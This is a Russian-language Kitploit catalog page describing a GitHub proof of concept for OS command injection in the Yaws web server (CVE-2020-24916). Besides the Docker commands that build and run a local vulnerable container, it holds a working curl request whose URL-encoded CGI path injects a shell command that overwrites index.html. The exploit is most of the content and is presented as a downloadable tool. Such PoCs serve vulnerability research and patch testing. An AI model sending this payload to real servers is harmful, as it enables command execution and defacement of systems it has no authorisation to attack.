Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
poc-yaws-cgi-shell-injection — Yaws веб-сервер POC внедрения OS-команд | Kitploit
Инструменты/GitHubGitHub/vulnbe/poc-yaws-cgi-shell-injection
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложений
GitHubvulnbe/poc-yaws-cgi-shell-injection

poc-yaws-cgi-shell-injection

Yaws веб-сервер POC внедрения OS-команд

Репозиторий
116 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Внедрение команд ОС в веб-сервере Yaws (CVE-2020-24916)

Доказательство концепции

Соберите тестовый образ:

docker build -t vulnbe/yaws-pocs:shell-injection-appmod-cgi -f Dockerfile .

и/или

Запустите контейнер docker run --rm -d -i -p 127.0.0.1:8000:8080 vulnbe/yaws-pocs:shell-injection-appmod-cgi

root@kitploit:~
curl 'http://127.0.0.1:8000/cgi-bin/%22%60export%20Z=$(pwd%7Ccut%20-c1);echo%20pawned%20completely%3E%3E..$Z%22%22index.html%60%22'
curl http://127.0.0.1:8000/index.html

Автор

Алексей Пронин (@vulnbe)

Ссылки

  • Анализ уязвимости
  • Yaws на GitHub
  • CVE-2020-24916
  • CWE-78: Некорректная нейтрализация специальных элементов, используемых в команде ОС («Внедрение команд ОС»)
  • Скачать инструмент